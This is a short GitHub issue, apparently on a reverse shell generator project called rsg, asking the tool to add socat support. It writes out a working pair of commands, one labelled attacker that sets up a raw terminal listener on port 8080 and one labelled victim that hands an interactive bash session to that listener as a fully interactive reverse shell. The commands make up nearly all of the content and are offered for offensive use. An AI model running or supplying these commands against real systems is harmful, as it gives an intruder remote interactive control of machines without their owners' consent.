rsg icon indicating copy to clipboard operation
rsg copied to clipboard

Feature request - socat

Open xambroz opened this issue 7 years ago • 0 comments

Far best option is to use socat for listening and hosting side:

attacker$ socat file:`tty`,raw,echo=0 tcp-listen:8080,fork

victim$   socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:127.0.0.1:8080,forever &

xambroz avatar Jan 04 '18 22:01 xambroz